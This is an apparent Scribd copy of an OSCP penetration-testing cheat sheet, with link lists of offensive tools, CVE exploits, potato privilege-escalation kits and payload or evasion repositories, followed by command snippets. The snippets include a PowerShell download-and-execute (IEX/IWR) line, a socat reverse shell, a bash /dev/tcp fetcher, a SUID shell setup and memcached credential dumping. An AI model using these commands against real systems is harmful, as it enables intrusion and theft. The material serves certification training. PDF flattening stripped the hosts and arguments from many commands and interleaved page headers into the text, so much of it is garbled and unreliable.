0% found this document useful (0 votes)
109 views11 pages

Cismcissp Sheetcheet

Uploaded by

nizamuddin.p
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
109 views11 pages

Cismcissp Sheetcheet

Uploaded by

nizamuddin.p
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 11

OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.

app/ Page 1 of 128 OSCP Cheat Sheet


ccoommmmiitt aaccttiivviittyy 1155//mmoonntthh ccoonnttrriibbuuttoorrss 33 Commands, Payloads
and Resources for the OffSec Certified Professional Certification (OSCP). Since this little project get's
more and more attention, I decided to update it as often as possible to focus more helpful and
absolutely necessary commands for the exam. Feel free to submit a pull request or reach out to me on
Twitter for suggestions. Every help or hint is appreciated! DISCLAIMER: A guy on Twitter got a point.
Automatic exploitation tools like sqlmap are prohibited to use in the exam. The same goes for the
automatic exploitation functionality of LinPEAS . I am not keeping track of current guidelines related to
those tools. For that I want to point out that I am not responsible if anybody uses a tool without double
checking the latest exam restrictions and fails the exam. Inform yourself before taking the exam! I
removed sqlmap because of the reasons above but Metasploit is still part of the guide because you can
use it for one specific module. Thank you Muztahidul Tanim for making me aware and to Yeeb for the
resources. OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 2 of 128 Here are the
link to the OSCP Exam Guide and the discussion about LinPEAS. I hope this helps. END NOTE: This
repository will also try to cover as much as possible of the tools required for the proving grounds boxes.
Thank you for reading. Table of Contents Basics Information Gathering Vulnerability Analysis Web
Application Analysis Password Attacks Reverse Engineering Exploitation Tools Post Exploitation Exploit
Databases CVEs Payloads Wordlists Social Media Resources Commands Basics curl Chisel File Transfer
FTP Kerberos Ligolo-ng OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 3 of 128
Linux Microsoft Windows PHP Webserver Ping Python Webserver RDP showmount smbclient socat SSH
Time and Date Tmux Upgrading Shells VirtualBox virtualenv Information Gathering memcached NetBIOS
Nmap Port Scanning snmpwalk Web Application Analysis Burp Suite cadaver Cross-Site Scripting (XSS)
ffuf Gobuster GitTools Local File Inclusion (LFI) PDF PHP Inclusion PHP Upload Filter Bypasses PHP Filter
Chain Generator PHP Generic Gadget Chains (PHPGGC) OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 4 of 128 Server-Side Request Forgery (SSRF) Server-Side Template
Injection (SSTI) Upload Vulnerabilities wfuzz WPScan XML External Entity (XXE) Database Analysis
MongoDB MSSQL MySQL NoSQL Injection PostgreSQL Redis sqlcmd SQL Injection SQL Truncation Attack
sqlite3 sqsh Password Attacks CrackMapExec fcrack hashcat Hydra John Kerbrute LaZagne mimikatz
pypykatz Exploitation Tools ImageTragick MSL / Polyglot Attack Metasploit Post Exploitation OSCP Cheat
Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 5 of 128 Active Directory Certificate Services
(AD CS) ADCSTemplate BloodHound BloodHound Python bloodyAD Certify Certipy enum4linux-ng Evil-
WinRM Impacket JAWS Kerberos ldapsearch Linux Microsoft Windows PassTheCert PKINITtools Port
Scanning powercat Powermad PowerShell pwncat rpcclient Rubeus RunasCs smbpasswd winexe CVE
CVE-2014-6271: Shellshock RCE PoC CVE-2016-1531: exim LPE CVE-2019-14287: Sudo Bypass CVE-2020-
1472: ZeroLogon PE CVE-2021–3156: Sudo / sudoedit LPE OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 6 of 128 CVE-2021-44228: Log4Shell RCE (0-day) CVE-2022-0847: Dirty
Pipe LPE CVE-2022-22963: Spring4Shell RCE (0-day) CVE-2022-30190: MS-MSDT Follina RCE CVE-2022-
31214: Firejail LPE CVE-2023-21746: Windows NTLM EoP LocalPotato LPE CVE-2023-22809: Sudo Bypass
CVE-2023-23397: Microsoft Outlook (Click-to-Run) PE (0-day) (PowerShell Implementation) CVE-2023-
32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0- day) CVE-2023-4911: Looney
Tunables LPE GodPotato LPE Juicy Potato LPE JuicyPotatoNG LPE MySQL 4.x/5.0 User-Defined Function
(UDF) Dynamic Library (2) LPE PrintSpoofer LPE SharpEfsPotato LPE Shocker Container Escape Payloads
Donut Exiftool GhostScript nishang Reverse Shells ScareCrow Shikata Ga Nai Web Shells ysoserial
Templates ASPX Web Shell Bad YAML Exploit Skeleton Python Script OSCP Cheat Sheet 24/10/2023,
08:22 https://md2pdf.netlify.app/ Page 7 of 128 JSON POST Rrequest Python Pickle RCE Python Redirect
for SSRF Python Web Request XML External Entity (XXE) Basics Name URL Chisel
https://tinyurl.com/z6yl32k CyberChef https://tinyurl.com/h8hf4uc Swaks https://tinyurl.com/ytqrw96w
Information Gathering Name URL Nmap https://tinyurl.com/9og4655 Vulnerability Analysis Name URL
nikto https://tinyurl.com/pu28ujz Sparta https://tinyurl.com/n24hfeb Web Application Analysis Name
URL ffuf https://tinyurl.com/2e5nyvw8 fpmvuln https://tinyurl.com/ys38zw8w Gobuster
https://tinyurl.com/y2bqjxcj JSON Web Tokens https://tinyurl.com/y3xmvqup OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 8 of 128 JWT_Tool https://tinyurl.com/2ry85jf7
Leaky Paths https://tinyurl.com/yman7qqf PayloadsAllTheThings https://tinyurl.com/y4ezgl4c PHP Filter
Chain Generator https://tinyurl.com/yv3gjun7 PHPGGC https://tinyurl.com/yaz8sz94 Spose
https://tinyurl.com/ynlscezd Wfuzz https://tinyurl.com/psuc9d9 WhatWeb https://tinyurl.com/7u2t8h9
WPScan https://tinyurl.com/kc9zypf ysoserial https://tinyurl.com/q4x2gct Password Attacks Name URL
CrackMapExec https://tinyurl.com/ngzqxs2 Default Credentials Cheat Sheet
https://tinyurl.com/2mbz9hdk Firefox Decrypt https://tinyurl.com/y5dzosvz hashcat
https://tinyurl.com/ytbkp2hp Hydra https://tinyurl.com/podb3lg John https://tinyurl.com/2yquyysj
keepass-dump-masterkey https://tinyurl.com/ypwg5xh2 KeePwn https://tinyurl.com/yq8uco5o Kerbrute
https://tinyurl.com/y66kz8ad LaZagne https://tinyurl.com/m9k4zzr mimikatz
https://tinyurl.com/qdf539r Patator https://tinyurl.com/onz6ly9 OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 9 of 128 pypykatz https://tinyurl.com/yxp3rds4 RsaCtfTool
https://tinyurl.com/ybvm97ey SprayingToolkit https://tinyurl.com/2yzbkw8x Reverse Engineering Name
URL AvalonialLSpy https://tinyurl.com/ywez6rvy binwalk https://tinyurl.com/ycgf2rn2 cutter
https://tinyurl.com/ypy6duxm dnSpy https://tinyurl.com/y7k9r2zy GEF https://tinyurl.com/nmtak2c
ghidra https://tinyurl.com/y5ojpa5p ImHex https://tinyurl.com/y32bgpm9 JD-GUI
https://tinyurl.com/yo3wyung peda https://tinyurl.com/ohx63nb pwndbg https://tinyurl.com/z5np3re
Radare2 https://tinyurl.com/y3tvmeoq Exploitation Tools Name URL Evil-WinRM
https://tinyurl.com/yyj7vkrg ImageTragick https://tinyurl.com/ycm9mqcs Metasploit
https://tinyurl.com/d3kqjuo MSL / Polyglot Attack https://tinyurl.com/y3qzu9oa OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 10 of 128 Post Exploitation Name URL ADCSKiller -
An ADCS Exploitation Automation Tool https://tinyurl.com/2xa2la3z ADCSTemplate
https://tinyurl.com/yp89grdv BloodHound Docker https://tinyurl.com/ypzjy87j BloodHound
https://tinyurl.com/y2s37jeg BloodHound https://tinyurl.com/ymc3svna BloodHound Python
https://tinyurl.com/ybsrj8pt Certify https://tinyurl.com/267b27re Certipy https://tinyurl.com/2c3ltmmt
enum4linux-ng https://tinyurl.com/ymbmo3kr Ghostpack-CompiledBinaries
https://tinyurl.com/ym88zaxv GTFOBins https://tinyurl.com/yccgv6ks Impacket
https://tinyurl.com/243wq45x Impacket Static Binaries https://tinyurl.com/ya5yzamu JAWS
https://tinyurl.com/223k2krg KrbRelay https://tinyurl.com/yw8bodx9 KrbRelayUp
https://tinyurl.com/2746ujpv Krbrelayx https://tinyurl.com/2bk3fjy5 LAPSDumper
https://tinyurl.com/287cdjlq LES https://tinyurl.com/yszcubjb LinEnum https://tinyurl.com/lxhk642
LOLBAS https://tinyurl.com/ypalagrk lsassy https://tinyurl.com/ygbh2wp6 OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 17 of 128 CVE-2022- 22963 Spring4Shell RCE (0-
day) https://tinyurl.com/ytkpunmc CVE-2022- 23119,CVE2022-23120 Trend Micro Deep Security Agent
for Linux Arbitrary File Read https://tinyurl.com/yupgsjay CVE-2022- 24715 Icinga Web 2 Authenticated
Remote Code Execution RCE https://tinyurl.com/ypsf9wrp CVE-2022- 26134 ConfluentPwn RCE (0- day)
https://tinyurl.com/yns7jz6s CVE-2022- 30190 MS-MSDT Follina Attack Vector RCE
https://tinyurl.com/23hee338 CVE-2022- 30190 MS-MSDT Follina RCE PoC https://tinyurl.com/ykqytpee
CVE-2022- 30190 MS-MSDT Follina RCE (Python Implementation) https://tinyurl.com/ynzqbrz6 CVE-
2022- 31214 Firejail / Firejoin LPE https://tinyurl.com/yl9bg39s CVE-2022- 31214 Firejail / Firejoin LPE
https://tinyurl.com/yo2v7szj CVE-2022- 34918 Netfilter Kernel Exploit LPE https://tinyurl.com/yvutxoye
CVE-2022- 46169 Cacti Authentication Bypass RCE https://tinyurl.com/ymfqxc7f CVE-2023- 21716 CVE-
2023-21716: Microsoft Word RTF Font Table Heap Corruption RCE PoC (Python Implementation)
https://tinyurl.com/ylj6smyx CVE-2023- 21746 Windows NTLM EoP LocalPotato LPE
https://tinyurl.com/ysjn82mr OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 18
of 128 CVE-2023- 21768 Windows Ancillary Function Driver for WinSock LPE POC
https://tinyurl.com/yrzdgxmy CVE-2023- 21817 Kerberos Unlock LPE PoC https://tinyurl.com/yqtw4ftq
CVE-2023- 22809 sudoedit LPE https://tinyurl.com/yn22klk9 CVE-2023- 23397 Microsoft Outlook (Click-
to-Run) PE (0- day) https://tinyurl.com/yt84jkf2 CVE-2023- 23397 Microsoft Outlook (Click-to-Run) PE (0-
day) (PowerShell Implementation) https://tinyurl.com/ytw4r8m7 CVE-2023- 23397 Microsoft Outlook
(Click-to-Run) PE (0- day) (Python Implementation) https://tinyurl.com/yr99sezo CVE-2023- 25690
Apache mod_proxy HTTP Request Smuggling PoC https://tinyurl.com/yowrwnad CVE-2023- 28879 Shell
in the Ghost: Ghostscript RCE PoC https://tinyurl.com/yn7zxx2f CVE-2023- 32233 Use-After-Free in
Netfilter nf_tables LPE https://tinyurl.com/yqp4wdzb CVE-2023- 32629, CVE2023-2640 GameOverlay
Ubuntu Kernel Exploit LPE (0- day) https://tinyurl.com/2x529wjt CVE-2023- 36874 Windows Error
Reporting Service LPE (0-day) https://tinyurl.com/yod47zs3 n/a dompdf RCE (0-day)
https://tinyurl.com/yuxao3cz OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 19
of 128 n/a dompdf XSS to RCE (0- day) https://tinyurl.com/ykvvdvw3 n/a StorSvc LPE
https://tinyurl.com/yoszh6zz n/a DCOMPotato LPE https://tinyurl.com/ywlpnlof n/a GenericPotato LPE
https://tinyurl.com/yus69d92 n/a GodPotato LPE https://tinyurl.com/2a3qo93f n/a JuicyPotato LPE
https://tinyurl.com/ybokbztq n/a Juice-PotatoNG LPE https://tinyurl.com/2dq9ve6n n/a MultiPotato LPE
https://tinyurl.com/25ykdfoc n/a RemotePotato0 PE https://tinyurl.com/yfbvx5ex n/a RoguePotato LPE
https://tinyurl.com/2863etm8 n/a RottenPotatoNG LPE https://tinyurl.com/ya4shaht n/a SharpEfsPotato
LPE https://tinyurl.com/ymoyb85q n/a SweetPotato LPE https://tinyurl.com/26gksp5m n/a SweetPotato
LPE https://tinyurl.com/ypogekl9 n/a S4UTomato LPE https://tinyurl.com/ylvah6ln n/a PrintSpoofer LPE
(1) https://tinyurl.com/ypcgaqhn n/a PrintSpoofer LPE (2) https://tinyurl.com/yw7rvx9n n/a Shocker
Container Escape https://tinyurl.com/k9h45xr n/a SystemNightmare PE https://tinyurl.com/yhty6n9d
n/a NoFilter LPE https://tinyurl.com/ywx49muw n/a OfflineSAM LPE https://tinyurl.com/ypzgcnjg n/a
OfflineAddAdmin2 LPE https://tinyurl.com/ypzgcnjg/OfflineAddAdmin2 n/a Kernelhub
https://tinyurl.com/yso389vq OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 20
of 128 n/a Windows Exploits https://tinyurl.com/yyhlsjdm n/a Pre-compiled Windows Exploits
https://tinyurl.com/ya95cf93 Payloads Name URL AMSI.fail https://tinyurl.com/yv44ju36 Donut
https://tinyurl.com/26tw6g8p Freeze https://tinyurl.com/2djf5w9d hoaxshell
https://tinyurl.com/295mlft5 Invoke-Obfuscation https://tinyurl.com/lr4ekst marshalsec
https://tinyurl.com/yb7bsz26 nishang https://tinyurl.com/y22f77lj Payload Box
https://tinyurl.com/ykdy65tn PayloadsAllTheThings https://tinyurl.com/y4ezgl4c phpgcc
https://tinyurl.com/yaz8sz94 PHP-Reverse-Shell https://tinyurl.com/ysl8hdnj PowerLine
https://tinyurl.com/yp3lzx7n PowerShell Encoder (CyberChef) [Receipe for encoding PowerShell
Payloads for Windows] (https://tinyurl.com/ytrnyml6#recipe=Encode_text('UTF16LE
%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')) Raikia's Hub Powershell Encoder
https://tinyurl.com/y3zhk99t ScareCrow https://tinyurl.com/y2467n9h Shikata Ga Nai
https://tinyurl.com/y9b9hs4z unicorn https://tinyurl.com/p6kfz6k OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 21 of 128 Veil https://tinyurl.com/ycheggz2 webshell
https://tinyurl.com/y8m8pbyx Web-Shells https://tinyurl.com/ylm8lwaf woodpecker
https://tinyurl.com/y3opm9dq ysoserial https://tinyurl.com/q4x2gct ysoserial.net
https://tinyurl.com/yyejhaeu Wordlists Name URL bopscrk https://tinyurl.com/ylkz2jxh CeWL
https://tinyurl.com/ymq4a4q5 COOK https://tinyurl.com/yww7z4r9 CUPP https://tinyurl.com/y75okmhy
Kerberos Username Enumeration https://tinyurl.com/ykb3hbzh SecLists https://tinyurl.com/luzosh8
Social Media Resources Name URL IppSec (YouTube) https://tinyurl.com/y8qpg2ll IppSec.rocks
https://tinyurl.com/yo49epz3# 0xdf https://tinyurl.com/ytap82my HackTricks
https://tinyurl.com/2gzgwhv4 Hacking Articles https://tinyurl.com/yn8wokj3 Rana Khalil
https://tinyurl.com/2onufexo OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 22
of 128 Commands Basics curl Chisel Reverse Pivot ./chisel server -p 9002 -reverse -v ./chisel client :9002
R:3000:127.0.0.1:3000 SOCKS5 / Proxychains Configuration ./chisel server -p 9002 -reverse -v ./chisel
client :9002 R:socks File Transfer Certutil certutil -urlcache -split -f "http:///" Netcat nc -lnvp < nc > curl -v
http:// // verbose output curl -X POST http:// // use POST method curl -X PUT http:// // use PUT method
curl --path-as-is http:///../../../../../../etc/passwd // use --path-as-is to handle /../ or /./ in the given URL
curl --proxy https://tinyurl.com/hdorn // use proxy curl -F myFile=@ http:// // file upload curl${IFS}/ //
Internal Field Separator (IFS) example OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/
Page 23 of 128 Impacket sudo impacket-smbserver ./ sudo impacket-smbserver . -smb2support copy
* \\\ PowerShell Bash only wget version Paste directly to the shell. function __wget() { : ${DEBUG:=0}
local URL=$1 local tag="Connection: close" local mark=0 if [ -z "${URL}" ]; then printf "Usage: %s \"URL\"
[e.g.: %s https://tinyurl.com/ynpjv2wt" \ "${FUNCNAME[0]}" "${FUNCNAME[0]}" return 1; fi read proto
server path <<<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\
r\n\r\n" >&3 while read line; do [[ $mark -eq 1 ]] && echo $line if [[ "${line}" =~ "${tag}" ]]; then mark=1
iwr / -o IEX(IWR http:///) -UseBasicParsing powershell -command Invoke-WebRequest -Uri http://:/ -
Outfile C:\\temp\\ OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 24 of 128 fi
done <&3 exec 3>&- } __wget http:/// curl version function __curl() { read proto server path
<<<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while
read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } __curl http:/// > FTP ftp wget -r
ftp://anonymous:anonymous@ Kerberos sudo apt-get install krb5-kdc impacket-getTGT /:'' export
KRB5CCNAME=.ccache export KRB5CCNAME='realpath .ccache' OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 25 of 128 Ligolo-ng https://tinyurl.com/25rtqzlc Download Proxy and
Agent Prepare Tunnel Interface sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo
up Setup Proxy on Attacker Machine ./proxy -laddr :443 -selfcert Setup Agent on Target Machine ./agent
-connect :443 -ignore-cert Session /etc/krb5.conf // kerberos configuration file location kinit // creating
ticket request klist // show available kerberos tickets kdestroy // delete cached kerberos
tickets .k5login // resides kerberos principals for login (place in home directory) krb5.keytab // "key
table" file for one or more principals kadmin // kerberos administration console add_principal // add a
new user to a keytab file ksu // executes a command with kerberos authentication klist -k
/etc/krb5.keytab // lists keytab file kadmin -p kadmin/ -k -t /etc/krb5.keytab // enables editing of the
keytab file wget https://tinyurl.com/25rtqzlc/releases/download/v0.4.3/ligolo-
ng_agent_0.4.3_Linux_64bit.tar.gz wget https://tinyurl.com/25rtqzlc/releases/download/v0.4.3/ligolo-
ng_proxy_0.4.3_Linux_64bit.tar.gz OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/
Page 26 of 128 ligolo-ng » session [Agent : user@target] » ifconfig sudo ip r add 172.16.1.0/24 dev ligolo
[Agent : user@target] » start Linux CentOS doas -u /bin/sh Environment Variables export PATH=`pwd`:
$PATH gcc gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit i686-w64-mingw32-gcc -o
main32.exe main.c x86_64-w64-mingw32-gcc -o main64.exe main.c getfacl getfacl iconv echo "" | iconv -
t UTF-16LE | base64 -w 0 echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0 iconv -f ASCII -t UTF-16LE .txt
| base64 | tr -d "\n" OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 27 of 128
vi :w !sudo tee % # save file with elevated privileges without exiting Windows Command Formatting
echo "" | iconv -f UTF-8 -t UTF-16LE | base64 -w0 Microsoft Windows dir dir flag* /s /p dir /s /b *.log
PHP Webserver sudo php -S 127.0.0.1:80 Ping ping -c 1 ping -n 1 Python Webserver sudo python -m
SimpleHTTPServer 80 sudo python3 -m http.server 80 RDP xfreerdp /v: /u: /p: /dynamic-resolution
+clipboard xfreerdp /v: /u: /d: /pth:'' /dynamic-resolution +clipboard rdesktop OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 28 of 128 showmount /usr/sbin/showmount -e
sudo showmount -e chown root:root sid-shell; chmod +s sid-shell smbclient Download multiple files at
once mask"" recurse ON prompt OFF mget * Upload multiple Files at once recurse ON prompt OFF mput
* socat socat TCP-LISTEN:,fork TCP:: socat file:`tty`,raw,echo=0 tcp-listen: smbclient -L \\\ -N smbclient -
L /// -N smbclient -L ///// -N smbclient -U "" -L \\\\\\ smbclient -L //// -U % smbclient ///SYSVOL -U %
smbclient "\\\\\" smbclient \\\\\\ -U '' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE
SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 smbclient --no-pass /// mount.cifs /// /mnt/remote
guestmount --add '//' --inspector --ro /mnt/ -v OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 29 of 128 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:: socat
tcp-listen:5986,reuseaddr,fork tcp::9002 socat tcp-listen:9002,reuseaddr,fork tcp:192.168.122.228:5968
& SSH ssh user@ -oKexAlgorithms=+diffie-hellman-group1-sha1 ssh -R 8080::80 ssh -L
8000:127.0.0.1:8000 @ ssh -N -L 1234:127.0.0.1:1234 @ ssh -L 80::80 ssh -L 127.0.0.1:80::80 ssh -L
80:localhost:80 Time and Date Get the Server Time sudo nmap -sU -p 123 --script ntp-info Stop
virtualbox-guest-utils to stop syncing Time sudo /etc/init.d/virtualbox-guest-utils stop Stop systemd-
timesyncd to sync Time manually sudo systemctl stop systemd-timesyncd Disable automatic Sync sudo
systemctl disable --now chronyd Options to set the Date and Time OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 30 of 128 sudo net time -c sudo net time set -S sudo net time \\ /set /y
sudo ntpdate sudo ntpdate -s sudo ntpdate -b -u sudo timedatectl set-timezone UTC sudo timedatectl
list-timezones sudo timedatectl set-timezone '/' sudo timedatectl set-time 15:58:30 sudo timedatectl set-
time '2015-11-20 16:14:50' sudo timedatectl set-local-rtc 1 Keep in Sync with a Server while [ 1 ]; do
sudo ntpdate ;done Tmux ctrl b + w # show windows ctrl + " # split window horizontal ctrl + % # split
window vertical ctrl + , # rename window ctrl + { # flip window ctrl + } # flip window ctrl + spacebar #
switch pane layout Copy & Paste :setw -g mode-keys vi ctrl b + [ space enter ctrl b + ] Search ctrl b + [ #
enter copy ctrl + / # enter search while within copy mode for vi mode n # search next OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 31 of 128 shift + n # reverse search Logging ctrl b
shift + P # start / stop Save Output ctrl b + : capture-pane -S - ctrl b + : save-buffer .txt Upgrading Shells
python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl + z stty
raw -echo fg Enter Enter export XTERM=xterm Alternatively: script -q /dev/null -c bash /usr/bin/script -
qc /bin/bash /dev/null Oneliner Fixing Staircase Effect stty raw -echo; fg; ls; export SHELL=/bin/bash;
export TERM=screen; stty rows 38 columns 116; reset; OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 32 of 128 env reset or stty onlcr VirtualBox sudo pkill VBoxClient &&
VBoxClient --clipboard virtualenv sudo apt-get install virtualenv virtualenv -p python2.7 venv .
venv/bin/activate python.exe -m pip install virtualenv python.exe -m virtualenv venv venv\Scripts\
activate Information Gathering memcached https://tinyurl.com/yscq43ox memcrashed / 11211/UDP
npm install -g memcached-cli memcached-cli :@:11211 echo -en "\x00\x00\x00\x00\x00\x01\x00\
x00stats\r\n" | nc -q1 -u 127.0.0.1 11211 STAT pid 21357 STAT uptime 41557034 STAT time 1519734962
sudo nmap -p 11211 -sU -sS --script memcached-info OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 33 of 128 stats items stats cachedump 1 0 get link get file get user get
passwd get account get username get password NetBIOS nbtscan nmblookup -A Nmap Port Scanning for
p in {1..65535}; do nc -vn $p -w 1 -z & done 2> .txt snmpwalk snmpwalk -c public -v1 snmpwalk -v2c -c
public 1.3.6.1.2.1.4.34.1.3 snmpwalk -v2c -c public .1 snmpwalk -v2c -c public nsExtendObjects
snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.25 sudo nmap -A -T4 -sC -sV -p- sudo nmap -sV -sU sudo nmap
-A -T4 -sC -sV --script vuln sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery sudo nmap -sC -sV -p-
--scan-delay 5s sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-
users.realm='test' ls -lh /usr/share/nmap/scripts/*ssh* locate -r '\.nse$' | xargs grep categories | grep
categories | grep 'default\|version\|safe' | grep smb export ip=; for port in $(seq 1 65535); do timeout
0.01 bash -c " /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 34 of 128 snmpwalk -c public -v1
1.3.6.1.2.1.25.4.2.1.2 snmpwalk -c public -v1 .1.3.6.1.2.1.1.5 snmpwalk -c public -v1
1.3.6.1.4.1.77.1.2.3.1.1 snmpwalk -c public -v1 1.3.6.1.4.1.77.1.2.27 snmpwalk -c public -v1
1.3.6.1.2.1.6.13.1.3 snmpwalk -c public -v1 1.3.6.1.2.1.25.6.3.1.2 Web Application Analysis Burp Suite
Ctrl+r // Sending request to repeater Ctrl+i // Sending request to intruder Ctrl+Shift+b // base64
